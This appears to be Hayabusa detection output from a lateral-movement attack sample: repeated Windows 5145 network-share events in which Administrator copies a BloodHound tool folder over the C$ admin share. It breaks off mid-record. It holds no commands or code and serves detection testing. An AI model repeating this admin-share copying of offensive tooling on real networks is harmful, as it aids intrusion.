LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.087 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.097 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.097 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.107 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.107 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.107 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.117 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.117 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.117 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.127 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.127 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.137 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.137 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.137 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.147 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.147 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.147 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.147 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.157 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.157 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.167 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.167 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.177 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.177 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.177 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.187 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.187 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.197 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.197 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.197 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.197 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.207 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.207 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.207 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.217 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.217 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.227 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.227 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.227 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.237 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.237 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.237 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.237 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.247 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.247 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.247 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.257 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.257 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.257 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.267 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.267 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.267 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.277 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.277 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.277 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.277 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 